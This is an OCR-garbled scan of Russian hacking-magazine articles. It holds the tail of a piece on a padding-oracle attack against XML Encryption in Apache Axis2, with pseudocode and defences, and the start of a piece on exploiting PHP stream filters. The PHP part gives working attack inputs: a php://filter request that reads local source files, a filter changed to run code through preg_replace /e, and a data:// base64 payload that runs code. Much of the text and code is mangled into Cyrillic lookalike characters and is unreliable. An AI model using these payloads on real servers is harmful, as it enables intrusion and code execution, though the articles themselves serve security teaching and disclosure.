Іприі: : 

С=(ІѴ1. С[0]). і - номер байта в блоке 



Ои-Ериі: : 

І-Й байт Х[і ] блока промежуточного открытого 
текста X = АЕ5_РЕС(к, С [0] ) 

В алгоритме нет ничего сложного. Изменяя \-ѵ\ байт вектора 
инициализации, мы наблюдаем за сообщениями сервера и ждем, 
пока на )-м месте в открытом тексте появится наш запретный 
символ. Ты спросишь меня, почему так? Отвечу: таков режим СВС. 
Для него справедливо следующее (опять все внимание на первую 
иллюстрацию): 

АЕ5_ОЕС_СВС(к, (ІѴ2, С[0])) = ІѴ2 хог АЕ5_ОЕС(к, С[0])„= 
ІѴ2 хог Х[0] . 



НЕПОЛНЫЙ БЛОК С ПОМОЩЬЮ 
ПРОИЗВОЛЬНЫХ ЗНАЧЕНИЙ 
ДОПОЛНЯЕТСЯ ДО ПОЛНОГО, 

А В ЕГО ПОСЛЕДНИЙ БАЙТ 
ВПИСЫВАЕТСЯ КОЛИЧЕСТВО 
ЭТИХ ПРОИЗВОЛЬНЫХ ЗНАЧЕНИЙ 

3. Так как весь промежуточный блок Х[0] восстановлен, то нам 
остается получить блок открытого текста М [0]. Для этого мы 
осуществляем операцию ХОР надХ[0] и вектором инициализации 
IV. 

Вот такой незамысловатый алгоритм действий. Вся последова- 
тельность наглядно проиллюстрирована на втором рисунке. 



ХМЬИХМЬЕМСРУРТЮМ 



ЕхІепзіЫе Магкир І_апдиаде (или коротко ХМІ_) представляет собой 
язык разметки для сериализации древовидных структур. Важная 
особенность ХМІ_ состоит в том, что символы «<» и «>» разрешается 
использовать только для обозначения узловых элементов (побе). 
Так, если текст содержит один из этих символов, то перед сериали- 
зацией в ХМІ_ его необходимо заменить на «&ІІ;» или «&дІ;» соот- 
ветственно. Точно так же для символа апмерсанда «&» применяет- 
ся езсаре-последовательность «&атр;». Перечисленные свойства 
ХМІ_ играют важную роль при атаке на ХМІ_ Епсгурііоп. 

Консорциум ѴѴЗС выпустил рекомендации ХМІ_ Бідпаіиге и ѴѴЗС 
ХМІ_ Епсгурііоп, что способствовало стандартизации ХМІ_ и средств 
для применения криптографических примитивов (электронной 
цифровой подписи, симметричных алгоритмов и т. д.) к произволь- 
ным данным в формате ХМІ_. 

Сначала разберемся с синтаксисом ХМІ_ Епсгурііоп, который 
проиллюстрирован на третьем рисунке. Как видно, спецификация 
описывает формат метаданных, используемых при шифровании 
(идентификаторы ключей, алгоритмов, схем шифрования и т. д.). 
Наиболее важным является элемент <СірЬегѴаІие>, который, соб- 
ственно, и содержит шифрованный текст. 

Обработка полученного шифрованного сообщения осущест- 
вляется с помощью крайне простого способа. Сначала во всем 
документе проводится поиск элементов <ЕпсгурІесЮаІа>. Каждый 
такой элемент содержит метаданные с информацией о ключах, ко- 
торая разбирается, обрабатывается и используется для построения 
ключа дешифрования данных. Затем содержимое <СірЬегѴаІие> из- 
влекается и разбирается для получения шифрованного текста. Для 



<?эпл1 ѵегіійп н, 1 ь Ѳ' епсйіііп^'иН-й 1 ^ 

^ЕпсгурІеДОйЪа Тура» 1 //уѵгсге ■ '.ѵЗ ■ огя / 2Й&1 сііЕ * х^т Іп і- 1 ■ нЗ г ог к/ Д Эй 3,/64/^п- 1 Ёпс 1 > 

чЕпсгур4іо^'*^Ьо 6 Аіеогі±Ьіі« ‘ Мер : ' > 

Епс гурх і ^ і 

<КеуІп*е хіпіоа- - ГіЕіо; /Атн-ѵЗ 

< КеуПліге > ЭоЬп Зт > 

</§Сйу1пГо>| 

«СІрІіагОаЕа* 

, » </Сір4ісгѵ«Аие> 

</Еікгур* е4свд«> 
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Взлом ХМІ_ Епсгурііоп 



дешифрования полученного шифротекста используется алгоритм, 
информация о котором содержится в элементе <Епсгур*іопМе*ЬосІ>. 
Особенно важный момент для атаки наступает на последнем этапе, 
когда открытый текст парсится и вставляется в ХМІ_-документ. 

Если во время процесса дешифрования и разбора возникает ошиб- 
ка, то она передается ХМЬпроцессору, который обычно выбрасы- 
вает исключение. А что еще ему остается делать? :-] 

Так как технологию ХМІ_ Епсгурііоп можно применять к произ- 
вольной части дерева ХМЬдокумента (лишь бы она имела коррект- 
ный синтаксис ХМІ_), то для разных типов контента существуют 
разные режимы шифрования. Используемый режим указывается 
в поле Туре тега <Епсгур*есЮа*а>. Тип Епсгуріеб ЕІетеп* означа- 
ет, что дешифрованию подвергается один ХМЬэлемент со всеми 
своими дочерними узлами. Тип Епсгуріеб Соп*еп* говорит о том, что 
дешифрованию подвергается произвольное количество узловых 
элементов со всеми своими дочерними элементами, комментария- 
ми, инструкциями по обработке и т. д. Тип Епсгуріеб Тех* Соп*еп*, 
являющийся частным случаем типа Епсгур*есІ Соп*еп*, выделен 
для таких открытых текстов, которые состоят только из текстовых 
данных. Таким образом, информация в поле Туре дает нам подсказ- 
ку об открытом тексте. Стоит отметить, что при дешифровании этот 
атрибут обычно игнорируется ХМІ_ Ргатеѵѵогк'ом и не влияет на по- 
следовательность действий при обработке шифрованного текста. 

Пару слов необходимо сказать и еще об одном важном момен- 
те — кодировке. СтандартХМІ. Епсгур*іоп предписывает использо- 
вать кодировку СІТР-8, которая указывает битовое представление 
символов различных алфавитов, а также других специальных 
символов. Наиболее значимая для нас группа символов всей 
таблицы ІІТР-8 — это символы английского алфавита, цифры, а 
также спецсимволы перевода строки (Ііпе *ееб) и возврата каретки 
(саггіаде ге*игп). Важно знать, что для этой группы символов коды 
А5СІІ совпадают с кодами ІІТР-8. 

Также ты наверняка помнишь, что код А5СІ I представляет 
символы как одиночные байты и позволяет закодировать 128 раз- 
личных символов (смотри рисунок 4). Замечу, что эта кодировка 
использует только семь из восьми бит в байте, старший бит всегда 
равен нулю. 



АХІ52 — ФРЕЙМВОРК ДЛЯ СОЗДАНИЯ 
ВЕБ-СЕРВИСОВ 



За последние несколько лет появилось довольно много фрейм- 
ворков для разработки веб-сервисов. Одним из самых популярных 
решений в этой области является АрасЬе Ахіз2 Ргатеѵѵогк, модуль 
Ратраг* которого содержит реализацию стандарта ѴѴ5-5есигі*у. 
Этот стандарт и позволяет нам применять ХМІ_ Епсгур*іоп и ХМІ_ 
5ідпа*иге в сообщениях 50АР. 

Чтобы этот модуль можно было использовать в Ахіз2 
Ргатеѵѵогк, он должен быть элементом потока обработки сообще- 
ний (теззаде Лоѵѵ). Поток обработки сообщений (теззаде Поѵѵ) — 
это цепочка модулей, каждый из которых получает входящее 
50АР-сообщение (или контекст сообщения), обрабатывает его и 
передает следующему модулю в цепочке. Когда 50АР-сообщение 
достигает конца цепочки, оно перенаправляется в Меззаде 
Ресеіѵег, который, в свою очередь, вызывает функцию класса 
Зегѵісе и отправляет результат пользователю сервиса. 

Обычно поток обработки сообщений в Ахіз2 состоит из трех 
модулей: Тгапзрог*, 5есигі*у и ОізраісЬ. Модуль 5есигі*у, как видно 



ХМІ_5ЮІ\ІАТІІРЕ 



ХМІ - Бідпаіиге — спецификация ѴѴЗС, определяющая синтаксис 
и порядок применения электронной цифровой подписи и кодов 
аутентификации для данных в формате ХМІ_. 



ЧТО ТАКОЕ ОРАКУЛЫ? 



В современной криптографии есть направление РгоѵаЫе 5есигі*у, 
которое подразумевает анализ исследуемой системы при активном 
воздействии на нее. Предполагается, что злоумышленник имеет 
возможность посылать запрос и анализировать полученный ответ, 
затем создавать новый запрос на основе полученной информации, 
опять получать ответ и т. д. Под оракулом понимаютто, что отвечает 
на запросы злоумышленника (сервер, просто комп, смарт-карту, 
СКЗИ, шифровальщик и др.). В нашем сегодняшнем примере в 
качестве оракула выступает сервер с веб-сервисом, то есть мы 
посылаем сервису запрос на обработку данных, а он возвращает 
либо ошибку, либо результат обработки данных. Ахіз2, в свою 
очередь, — это фреймворкдля создания веб-сервисов. Недавно 
была новость про РасИіпд Огасіе А**аск, где в качестве оракула 
выступало приложение (веб-сервис, сайт на А5Р. N ЕТ), созданное с 
использованием .пе*. 



из названия, отвечает за безопасность. В процессе обработки 
зашифрованного сообщения он сначала осуществляет процесс 
дешифрования, а затем парсит открытый текст с помощью парсера 
ХМІ_ и обновляет контекст 50АР-сообщения. Дешифрованный и 
проверенный контент передается модулю Оізра*сЬ. Как и Меззаде 
Ресеіѵег, каждый модуль в цепочке теззаде Лоѵѵ может прервать 
процесс обработки сообщения 50АР при возникновении ошибки, 
после чего процесс обработки прекращается и пользователю сер- 
виса выдается соответствующее сообщение. 

Теперь ты наверняка понял, к чему я все это рассказывал и кто 
виновник уязвимости в Ахіз2. :-) 



ОШИБКИ В СИСТЕМЕ БЕЗОПАСНОСТИ В АХІ52 



В качестве оракула у нас будет выступать сервер с веб-сервисом, 
созданным с использованием Ахіз2. Поначалу нам нужно понять, 
какие сообщения об ошибках безопасности выдает сервер, так как 
тогда мы сможем отличить ответ *ше от ответа *аІзе нашего ораку- 
ла. При возникновении ошибки безопасности сервис передает нам 
зесигі*у *аиІ*. Причины генерации зесигі*у *аиІ* можно разделить на 
две категории: 

1. Ошибка дешифрования 

Такая ошибка возникает при некорректном дополнении послед- 
него блока. Помнишь, я говорил, что последний байт каждого 
сообщения содержитчисло, равное количествудополненных 
байтов? Та к вот, этот последний байт может при ни мать значения 
от 0x01 до 0x1 0, в противном случае мы получаем сообщение об 
ошибке. 

2 . Ошибка парсинга данных 

Эта ошибка может возникнуть по двум причинам. Первая — 
открытый текст содержит «запрещенные» сим волы, то есть 
символы с кодами А5СІІ от 0x00 до 0x1 Р (за исключением 0x09, 
0х0А, 0х0й — пробела, конца строки и возврата каретки). Вторая 
причина — некорректный ХМ Ь-с и нтакси с дешифрованного со- 
общения, что означает появление в открытом тексте символа «&» 
(0x26) или «<»без соответствующегозакрывающего символа «>». 

В обоих случаях мы получаем одинаковое сообщение об ошибке 
и различить эти два случая между собой лишь по сообщению не 
можем. 

Как и в приведенном ранее простом примере, разобьем всю 
нашу таблицу А5СІІ на две группы символов (все внимание на 
четвертый рисунок). Группа А содержит запрещенные для формата 
ХМІ_ символы плюс два «зарезервированных» символа «&» и «<», 
ну а группа В включает в себя все остальные символы. 
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Теперь все готово для построения оракула. Как и в примере, наш 
оракул, то есть сервер, получает на вход один блок текста, зашифро- 
ванного в режиме СВС, то есть 16-байтовый вектор инициализации 
и зашифрованный блоктакого же размера, и возвращает Іше или 
{аізе. Конечно, этот блок должен быть правильно «обернут» в 50АР- 
сообщение, но здесь мы этим пренебрегаем. Итак, оракул возвращает 
Ігие, если сервер в ответ на 50АР(АЕ5_ЕІ\ІС_СВС(к, (IV, С))) передает 
нам зесигііу І'аиИ:, и возвращает {аізе в противном случае. 

Как я уже говорил, сервер не выдаст зесигііу іаиіі, если на сто- 
роне сервера сообщение имеет правильное дополнение до полного 
блока, то есть открытый текст М имеет верную ХМІ_-структуру: 

РАй(М) == (IV хог АЕ5 = йЕС(к л С)) 

Здесь должны выполняться следующие условия: 

1. М, содержащий ХМІ_-тег<а>, обязательно должен содержать и 
закрывающий тег</а>. 

2. Если М содержитсимвол амперсанда «&»,то он должен служить 
началом существующей езсаре-последовательности, например 
«&дІ». 

3. М не должен содержать символы из определенной нами группы В. 

В противном случае возникает ошибка зесигііу ІаиИ:, что позво- 
ляет нам использовать оракул точно так же, как и в предыдущем 
более простом примере. 



ВОССТАНОВЛЕНИЕ ОТКРЫТОГО ТЕКСТА 



Ну вот, теперь все готово для того, чтобы описать алгоритм вос- 
становления открытого текста из шифрованного. Этот шифрован- 
ный текст может содержать произвольное число блоков. Мы будем 
представлять его как массив С = ( I V, С[1], ... , С[сІ]), на первом месте 
в котором стоит вектор инициализации. Самое время еще раз 
вспомнить, что в режиме СВС вектором инициализации для блока 
С[і] является блок С[і-1]. 

Для простоты считаем, что открытый текст состоит только из 
символов А5СІІ (то есть в тексте нет ни одного символа из расши- 
ренной секции СІТР-8). В отличие от случая, описанного в простом 
примере, здесь «правильно сформированным» шифротекстом 
является такой шифротекст, открытый текст которого состоит 
из символов группы В и имеет однобайтное дополнение, то есть 
последний его байт равен 0x01 (это допущение введено для более 
простого изложения идеи атаки). 



ВЕБ-СЛУЖБЫ 



Веб-служба — это метод взаимодействия между двумя 
электронными устройствами через сеть передачи данных. 

ѴѴЗС определяет ѵѵеЬ-зегѵісе как программную систему, 
спроектированную для поддержки интероперабельности тасЫпе- 

*о-тасЫпе-взаимодействия. Интероперабельность подразумевает 
открытость интерфейсов и способность взаимодействовать с 
другими продуктами без каких-либо ограничений доступа и 
реализации. Зачастую интерфейсы взаимодействия описываются 
на специальном языке ѴѴ50І_ (ѴѴеЬ Бегѵісез Оезсгірііоп І_ап- 
диаде], в основе которого лежит ХМІ_. Веб-сервисы представляют 
собой наборы инструментов, к наиболее популярным способам 
использования которых относятся РРС (Рето* *е ргосебиге саііз, 
основная единица взаимодействия — вызов удаленной функции 
или метода), БОА (Бегѵісе-огіеЩесІ агсЫіесІиге, основная единица 
взаимодействия — сообщение) и РЕ5Т (РергезеЩаІіопаІ зіаіе Ігапз- 
^ег). В последнем случае основными единицами взаимодействия 
являются операции типа 6ЕТ, Р05Т, РІІТ, ОЕІ.ЕТЕ и т. д. в протоколах 
типа НИР, которые не поддерживают состояния. 




Меззаде ТІоѵѵ в АрасНе Ахіз2 



Алгоритм восстановления открытого текста включает в себя 
две процедуры. Первая (РіпсіІѴ) подготавливает шифротекст к 
проведению атаки. Она принимает на вход С = (IV, С[1], ... , С[сІ]) и 
номер блока і, а возвращает «правильно сформированный» блок 
шифртекста с новым вектором инициализации С=(іѵ, С[і]). Здесь 
все практически также, как в описанном выше простом примере. 
Вторая процедура (РіпсІХЬуІе) принимает на вход «правильно сфор- 
мированный» блок шифрованного текста (полученный при помощи 
РіпсіІѴ) и возвращает ]-іл байтХІПр] промежуточного блока открыто- 
го текста Х[і] = АЕ5_0ЕС(к, С[і]). Используя эти процедуры, опишем 
в псевдокоде алгоритм восстановления открытого текста. 

Іприі:: С=(С[0] = IV, С[1], . .., С [ сі ] ) 

Оиіриі:: М=(М[1], . . . . М[сІ]) 



■Рог і = 1 іо сі сіо 

іѵ = ГіпсІІѴСС, і) 
■Рог з = 1 іо 16 



ХЩ_Ш = РіпсІХЬѵ1=е(С[і] . іѵ, з) 

епсі -Рог 

Х[і] = (Х[Ц[1], .... хш [ 16 ]) 

М [і] = X [ і ] хог С [ і - 1 ] 

епсі -Рог 

пеііипп (М[1] М [сі ] ) 

Алгоритм прости не нуждается в подробном разъяснении. 
Скажу лишь только, что получить открытый текст М таким способом 
возможно благодаря режиму СВС (смотри на картинку, и все станет 
ясно). Остается только рассказать тебе об устройстве двух загадоч- 
ных функций: РіпсіІѴ и РіпсІХЬуіе. 



ПРОЦЕДУРЫ РІ N РІѴ И РІ N РХВУТЕ 



Процедура РіпсіІѴ чуть сложнее процедуры из тестового приме- 
ра, и во многом, как часто бывает в прикладной криптографии, 
эти сложности носят переборно-технический характер. Подроб- 
ное описание я приводить не буду, а ограничусь лишь изложени- 
ем идеи. 

Она, собственно, состоит в том, чтобы перебирать некоторые байты 
вектора инициализации и, анализируя результат, решить две за- 
дачи: убрать все символы «<» из открытого текста и задать такой 
последний байт нового вектора инициализации IV, чтобы байт 
дополнения равнялся 0x01. В результате мы получим правильно 
дополненный шифротекст с одним байтом дополнения, требуемый 
для процедуры РіпсІХЬуіе. Эта процедура, во многом также имею- 
щая переборно-технический характер, сводится, в свою очередь, 
к побитному восстановлению байта для блока промежуточного 
открытого текста. Она немного сложнее аналогичной упрощенной 
процедуры, описанной ранее, так как в данном случае «запрещен- 
ных символов» гораздо больше. 
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Таблица А5СІІ с делением символов на группы 



ВАРИАНТЫ АТАКИ 



На практике обычно всегда имеется дополнительная информация, ко- 
торая во многом облегчаетжизнь криптоаналитику. В данном случае 
любые дополнительные сведения об открытом тексте (его статистика, 
структура) могут во многом помочь и сократить число запросов к 
оракулу (удаленному серверу). Так, например, знание ХМІ_ БсЬет'ы 
документа позволяет не тратить время на восстановление уже из- 
вестного открытого текста (ХМЬтегов) и сосредоточить усилия на по- 
лезной информации. В то же время, если мы знаем, что в данном поле 
хранится, например, номер кредитной карты, это сильно сокращает 
группы разрешенных и запрещенных символов и позволяет эффек- 
тивно отсеивать при переборе ложные варианты байтов открытого 
текста. Интересен также тот факт, что оракул можно использовать 
не только для дешифрования, но и для шифрования произвольных 
данных с помощью неизвестного нам ключа. В этом случае процедуру 
надо начинать с конца (с последнего блока), а процесс шифрования 
будет проходить «справа налево». 



ВАРИАНТЫ ЗАЩИТЫ 



Когда речь заходит о средствах, помогающих предотвратить 
изменение шифрованного текста, в голову прежде всего прихо- 
дит мысль об использовании ЭЦП или аутентификации в рамках 
стандарта ХМІ_ Зідпаіиге. Однако этот способ защиты отпадает как 
неэффективный, поскольку атака под названием ХМІ_ Еідпаіиге 
ѴѴгарріпд, разработанная довольно давно, позволяет модифициро- 
вать шифрованный текст в обход подписи и/или МАС. Второй оче- 
видный путь — унификация сообщений об ошибках, чтобы хакеры 
не могли распознавать типы возникающих ошибок. Однако и этот 



вариант тоже не идеален. Во-первых, он перекладывает обязан- 
ности по созданию системы унификации ошибок на разработчика 
веб-сервиса, а во-вторых, приводит к появлению других каналов 
получения информации. В криптографии давно известен класс 
тайминг-атак, которые основаны на замерах времени, затрачи- 
ваемого удаленным сервером на обработку запроса. Пожалуй, 
самая действенная мера, которую можно предложить, — это смена 
режима шифрования СВС, основанного на блочном алгоритме, 
на режим с одновременной аутентификацией (например, 150/1 ЕС 
19772:2009), но это влечет за собой необходимость переделывания 
стандарта ХМІ_ Епсгурііоп. Вообще, если есть возможность, лучше 
всего перевести шифрование на более низкий уровень 051 (напри- 
мер, вместо ХМІ_ Епсгурііоп использовать версию 55І_/ТІ_5, которая 
не подвержена ВЕА5Т). 



ВМЕСТО ЗАКЛЮЧЕНИЯ 



Мне нравятся все атаки, основанные на использовании оракулов 
и анализе сообщений об ошибках, так как они ярко иллюстри- 
руют ситуацию, когда разработчики берут отличные надежные 
криптографические примитивы, но все равно получают еріс ^аіі. 

Я уверен, что уязвимость в ХМІ_ Епсгурііоп далеко не завершает 
список багов, которые позволяют проводить атаки зісіе-сбаппеі, 
и подобные уязвимости еще проявят себя. Надеюсь, что тебе 
было интересно, а если ты хочешь обсудить какие-то моменты 
этой статьи, смело пиши мне на почту. Напоследок хочу выразить 
благодарность Э и га) Зотогоѵзку и ТіЬог Эадег, обнаружившим эту 
уязвимость, за очередной интересный пример применения крип- 
тоанализа на практике. И-И 
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ЭКСПЛУАТАЦИЯ 
СВЕЖИХ 
УЯЗВИМОСТЕЙ 
В ФУНКЦИЯХ 
ДЛЯ РАБОТЫ 
С ФАЙЛАМИ 
ВРНР 



РНР предоставляет богатые 
возможности для работы 
с файлами. Любой веб- 
программист сталкивался с 
функциями Іюреп, сору, ЛІе_деі_ 
сопіепіз и т. д. Однако далеко не 
каждый знает о таких довольно 
эффективных конструкциях, как 
фильтры и потоки, в которых 
совсем недавно обнаружились 
крайне серьезные баги. 



ЕШ 

ЬШу/зЮсуб — 

последняя версия 
класса ЫдНІпіпд- 
Тетріаіе. 

ЫЫу/ШуѴѴѴ — 

пример использования 
класса І_ідНІпіпд- 
Тетріаіе. 

Ьй.Іѵ/пиігсідГ — 

статья, подробно 
рассказывающая об 
уязвимости РМе раЫі 
іщесііоп. 

разіеЬіп.сот/ІесІБиБѴМ 

— пример 
использования 
уязвимости РМе раІН 
іщесііоп. 

ЬіІ.Іѵ/дбгіРЗ — описание 
уязвимости, связанной 
с неправильной 
обработкой ключей в 
массиве $_РІІ_Е5. 



ГСП 

На нашем диске 
ты сможешь 
найти подробное 
обучающее видео ко 
всем описанным в 
статье примерам. 



СТАНДАРТНЫЕ ФИЛЬТРЫ 



Прежде чем приступать к описанию новых векторов атак, хочу 
немного рассказать о фильтрах и потоках, которые появились 
еще в РНР 4.3 и предоставили скриптам абстрактный слой для 
доступа к файлам. Различные ресурсы в РНР (сетевые соедине- 
ния, протоколы сжатия и т. д.) могут рассматриваться как «пото- 
ки» данных. Можно последовательно считывать информацию из 
таких потоков или записывать ее в них. При этом существует ряд 
зарегистрированных в РНР фильтров, с помощью которых можно 
модифицировать данные, получаемые из потока. Для того чтобы 
получить список имеющихся в твоей системе фильтров, достаточно 
выполнить такой код: 

ргіп1:_г(5І:геат_§е1:_б11:ег5( ) ) ; 

Чтобы использовать фильтр, его нужно связать с пото- 
ком. Это делается с помощью функции 5Ігеат_ПІІег_аррепсІ/ 






■ I гі мь тЛ ими- ч 



Сампописный фильтр в девелоперской версии форума рИрВВЗ 
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Атака на файлы 



51геат_1ч11ег_ргерепс1 или же с помощью враппера рЬр:/ЛіІІег. 
Первый способ предоставляет больше возможностей для работы 
с фильтрами, но второй более компактен, что тоже обеспечивает 
определенные преимущества. Вот один пример использования 
фильтров для кодирования строки: 

$-рр = Тореп( 1 рбр://ои1:ри1: ' 'м'Д; 

5Тгеат_б11:ег_аррепсІ($Тр., 

' сопѵегі: . диоІіесІ-рпіпІіаЫе-епсосІе ' ) ; 

-Рмгі1:е($-Рр. "I \ѵ І_оѵе \ѵ РНРЛп"); 

А вот пример однострочного скрипта, который получает данные 
методом Р05Т, кодирует их в Вазе64 и выводит обратно: 

геасІбІеС "ріір : //б!1іег/геасІ=сопѵег1: . Ьа5еб4-епсосІе/ 
гезоигсе=рІір : //іприі:" ) ; 

Вообще, РНР позволяет осуществлять подстановку одного 
враппера в другой, что помогает очень сильно сократить код. На- 
пример, соединение судаленным Йр-сервером, скачивание с него 
дг-архива, распаковку этого архива и сохранение его у себя на веб- 
сервере можно закодить всего в одной строке: 

сору( ' сотргезз .2ІіЬ://-Рі:р://и5еп: раз5@-Рі:рІі05І:. сот:21/ 
раТб/бІе.сІаІ: .§ 2 ' , , /1оса1/сору/о-Р/^^1е.сIа1: , ); 

Враппер рЬр:/ЛіІІег также применяется и для обеспечения 
безопасности веб-приложений. Например, скрипт 

іпсіисіе ($_Р05Т[ ' іпс 1 ] ) ; 

при настройке «аІІоѵѵ_и гі іпсіисіе = ОІТ» не позволит злоумыш- 
леннику провести атаку РРІ. Однако этот скрипт вполне позволяет 
прочитать локальные РНР-файлы — для этого достаточно послать 
уязвимому сценарию следующий Р05Т-запрос: 

Іпс=р1ір://б11:ег/геас1%30сопѵег1:. Ьаве64-епсосІе/ге5оигсе%30/ 
раТІі/БсгірІ: . рбр 

Хотя встроенные фильтры предоставляют впечатляющие воз- 
можности для решения самых разнообразных задач, разработчи- 
ки РНР пошли дальше и позволили веб-программистам создавать 
собственные фильтры. И вот это уже интереснее всего! 



ПИШЕМ СВОЙ ФИЛЬТР 



О создании пользовательских фильтров написано мало и от- 
рывочно, некоторые функции, необходимые для этого, очень 
скудно документированы. Тем не менее веб-приложения с такими 
фильтрами существуют. Предположим, что нам необходимо об- 
рабатывать потоки с помощью функции п 1 2 Ь г. Для этого мы и на- 
пишем свой фильтр. Я не буду приводить код полностью, поясню 
лишь основные моменты метода ЛІІег (полный код ищи на нашем 
диске). 

Итак, для начала нам нужно считать данные из потока. В даль- 
нейшем мы будем обрабатывать их с сохранением во внутренней 
переменной «$1Ы5->_сЫа»: 

ргіѵаііе $_с !а1:а: 



'л/бі1е($Ьиске1: = БІігеаш ЬискеІ: _таке_ыгі1:еаЫе($іп^ { 

$1: И ± 5 - >_сІ аі: а .= $Ьиске1:->сІа1:а; 

$ТІіІ5- >Ьиске1: = $Ьиске1:; 

$соп5итесІ = 0; 

} 

Когда мы прочитаем все данные из потока, параметр $сІозіпд 
приметзначение ТРІІЕ. Теперь можно их обрабатывать: 



І±0СІО5ІП§) { 

$соп5итесІ += 5І=п1еп( , $1=ІіІ5-> сІаііаѴ. 

$5І:г = п!2Ьг($1:ІіІ5->_сІа1:а V. 

$1:ИІ5 - >Ьиске1: - >с!а1:а = $5І:г; 

$1:ІіІ5->Ьиске1:->сІа1:а1еп = 5І:г1еп($1:ІіІ5->_сІа1:а); 



♦ * О *- §5«иге ■1ЯІ в№іА.азпі- ОС388ДЯВ9мОМ: 

{ни 5І11ЕЭ«* ,, НС'( Г /? 

</Ьсс4> 

<Ы>СІ гісі* П</Ы> 

(р Же По [[ пш | КУр> 

№ІЦЕІІІ^С I }</р> 
іиь іо іии 

ТІ и іКът 

<іі хі іи ік</іі> 

(4 ™ІІГ 
И «П4С4К I) 

</и1> 

</ІЯМѴ> 



іітріі рйрР 

г 

гсі|«ігг риг г 1 ^^гіз:ьпі 0 Теир 1 п.СЕ-р 1 ф і ? 

- шітлѵі 

и 

\ * ыот 1 1 лир! е. Ыжі * ) ; 

ЦЬ-НШі - 1 Іяцрій Тёьрііее 1 : 

Ііі<№*** - 'Иогій'; 

і I ; 

есЮ II:; 



п?із Р 

* 

п^ііп^псв 1 и^ішп^ТіцІіи. рЪр 1 ^ 

І ; ' -а ’ р лгглус 

1$ 

(ІС ■ ІІСТГ Ьі^іЬПІП^ТЕИр1в.С«{ 

'■ир1е.ІіЕі1 к | 

н» 11вІіиін^Гцр1йи(;иИ#_Г11«| 1 . /еасѣ* 1 ) 

1; 

*І т .->сзс1'7 » Тирііи 1 ; 

<1ъ->сіияе - 'Ноги 1 ; 

(іс-мгси - 



Пример использования класса ЫдЫпіпд Тетріаіе 



ХАКЕР 01 /156/2012 



025 





С0ѴЕР5Т0КѴ 



1±Цепщ1у^$1:ІіІ5- >Ьиске1:- >ба1:а) ) 

5І=геат_Ьиске1=_аррепсІ( , $ои1=. $1=ІіІ5->Ьиске1=) ; 
геііигп Р5Р5 РА55 0М ; 



іпсіисіе ( " . /И^ІтІ=піпеТетр1а1=е. ріір"') ; 

$11: = пеы И^ІіІіпіп^ТетрІаІіеС 1 ./затрІе.ІгЕтІ' ); 
$1і:->і:іі:1е = 'Му Тіііе'; 
есііо $11:; 



Мы отправляем обработанные данные на точку выхода, а 
фильтр возвращает значение Р5Р5_РА55_0І\І. Это означает, что 
все прошло успешно. Написанный фильтр нужно зарегистрировать. 
Делается это следующим образом: 

5І:геат_б11:еп_ге§І5І:ег( ' сопѵегі: . п12Ьг_б1:гіп§ ' , 

' п12Ьг_П11:ег ' ) ; 

Зарегистрированный фильтр доступен из любой функции, под- 
держивающей потоки. 



ПРИВЕТ ИЗ ЯПОНИИ 



Теперь, когда мы научились создавать собственные фильтры, по- 
смотрим, как они применяются в реально существующих скриптах. 
Воспользуемся для этого сервисом боодіе Собе БеагсЬ. Будем 
искать примеры использования функции 51геат_1ч11ег_гед151ег. 

При этом нам должен встретиться довольно интересный класс 
ЫдЫпіпд-ТетрІаІе (ссылки на сам класс и страницу разработчика 
ищи в сносках), который мы рассмотрим чуть подробнее. Допустим, 
у нас есть некий абстрактный шаблон затрІе.ЫтІ: 

<ІгІ:т1><Ііеаб> 

<те1:а сНагБѲ'Ь^'ігЕ-Р-в” /> 

<~ЕгЕ1е>{{ ііііе }}<АЕгЕ1е> 

</Ііеаб> < /Ы:т1 > 



сгенерит следующую НТМБ-страницу: 



< И1:т1 >< ИеасІ > 

<те1:а с^гБе^'и-рТ-Б" /> 

<1:і1:1е>Му Ті~Ые</~ЬгЫе> 

</Ііеаб></Іі1:т1> 

Таким образом, упомянутый класс по заданным шаблонам 
генерит соответствующий НТМБ-код. Хотелось бы сразу отметить, 
что подключение темплейтов в этом классе происходит через уже 
знакомую тебе конструкцию іпсіисіе, однако это не самое лучшее 
решение. Определенные группы пользователей обладают правами 
на редактирование темплейтов, что позволяет внедрять в них 
зловредный РНР-код, который успешно выполняется согласно 
логике данного класса. Самописный фильтр, идущий вместе с 
классом, как раз и делает всю основную работу по преобразованию 
НТМІ_-кода. Внесем небольшие изменения в этот фильтр: 

риЬІіс Типсііоп б И:ег($іп. $оиі., &$соп5итеб, $с1обіп§) { 
__мІті1е_($Ьиске1: = 5ігеат_Ьиске1:_таке_мгі1:еаЫе($іп) ) {_ 
$раі±егп5 = аггау( 

1 /\{%\б+іЛб+( . + ?)\5+%\}/е ’ , 

); 

$гер1асетеп1:5 = аггаѵС 



Тогда скрипт 



ЧРрИр ІТ Г. \$1:ііі5->сопсіі1:іоп($1) . '): ?>"* . 




Первый пример самописного фильтра 



); 

$Ьиске1:->ба1:а = рге§_гер1асе($раі:і:егп5, 
$пер1асетеп1:5 л $Ьиске1:->ба1:а); 



В строке, начинающейся с '"< ?рІп р ІТ, я удалил одинарные 
кавычки. Это не влияет на функциональность фильтра, но дает 
нам новые возможности. Изменив фильтр, я добился того, чтобы 
произвольные команды исполнялись с помощью ргед геріасе 
с модификатором «е». Таким образом, если в темплейте есть 
строка: 

{% і/Р ргіп1:_п(іпі = §еі_а^11()) %} 

— то при её обработке выполнится РНР-код. Важно отметить, 
что фильтры можно использовать с любыми функциями, поддержи- 
вающими потоки. Например, рассмотрим следующий скрипт: 

іпсіисіе ( " ./НѴИ^Іііпіп^ТетрІаіе. рбр") ; 

$Т = $_Р05Т[ "біе" ] ; 

йііайіж 

Вспоминаем, что один враппер можно подставить в другой. 
Поэтому наши команды будутуспешно выполняться для следующе- 
го Р05Т-параметра Іііе: 

б1е=рбр : /7б11:ег/геаб%Збсопѵег1: . І і^ ітіпіп^іетріаіебііег/ 
ге5оигсе%ЗсІ 

баіа ://1:ех1:/р1аіп%ЗЬЬа5е64 л еуІІ§аІлІУ§сН1рЬпРН : сіІірЬт1Т22Ѵ0Х2 
Р5ЬС§рК5А1Т(2 

Таким образом, фильтры с уязвимостями очень сильно снижают 
безопасность системы в целом, так как проэксплуатировать по- 
добные баги поможетлюбая функция, поддерживающая потоки, 
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ПОЛЬЗОВАТЕЛЬСКИЕ ФИЛЬТРЫ 



Пользовательский фильтр — это расширение встроенного класса 
рНр_и5ег_ЛІІег. При создании фильтра необходимо задать следующие 
методы: ТіМіег, опСгеаіе, опСІозе. Первым и самым важным методом 
является Л Пег, который принимает четыре параметра: 

